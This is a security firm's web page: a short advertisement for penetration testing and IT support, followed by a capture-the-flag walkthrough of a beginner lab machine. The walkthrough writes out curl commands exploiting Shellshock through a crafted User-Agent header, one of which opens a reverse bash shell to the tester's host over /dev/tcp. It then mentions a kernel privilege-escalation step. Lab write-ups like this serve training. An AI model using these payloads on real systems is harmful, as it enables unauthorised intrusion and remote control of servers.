Seven Layers delivers comprehensive, dependable, and cost-effective solutions tailored to our clients’ needs and budgets. We offer cutting edge defensive security strategies to provide you with the ability to protect key systems and information – and can pair those with traditional information technology services to keep your business up and running, so you can focus on the business that is important to you.

    We provide penetration testing services and vulnerability assessments for peace of mind, risk management, and regulatory compliance. And because your employees are often your first line of defense - or weakness – we offer employee education in computer security and corporate security policies.

    Our support services cover your full suite of end user desktops, in-house servers, cloud-based servers, and cloud services. This includes seamless support for employees in all locations, whether they are in corporate offices, or are remote users. We will manage and develop content management systems, customized software and web applications, as well as working with off the shelf applications.


     

    The description states that the box is "Beginner" and "Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root)."  I don't want to put too much information up front but if you haven't been hacking for long, this is a blast from the past with a neat entry. 

    We kick off with Nmap:



    Two ports open so we're going to hit the web port with Nikto:


    As I'm typing this, I just realized I never even bothered looking with a browser because as soon as I saw Shellshock, I knew where I was headed.  That just comes from experience and having seen this vulnerability a ton of times.

    Keeping things simple, let's just see if this is really vulnerable:

    curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://192.168.86.150/cgi-bin/test/test.cgi


    Excellent!  We execute ID and we get a response.  Now let's see if we can get a shell:

    curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.86.99/443 0>&1' http://192.168.86.150/cgi-bin/test/test.cgi


    With our handler setup:


    Excellent!  We catch our shell and we clean up the environment.  Now let's see what we're dealing with:


    Ok, this is an old version of Ubuntu which is probably vulnerable to Dirty Cow but let's go for something different:


    We move the exploit over to the victim and when we try to compile, we get an error.  We can fix that error with the following:

    PATH=PATH$:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH


    We execute our exploit, we check our ID, and we go for the root flag!  #GameOver

    I would definitely call this a beginner box but if you haven't played with Shellshock, it's new to you.  The error is also a wildcard.  I don't know if that was intentional or not but I've seen that as well and I had the fix in my notes.


    Cybersecurity solutions for small businesses.

    info@sevenlayers.com
    877.468.0911

    © 2021 Seven Layer Networks, Inc. | All rights reserved.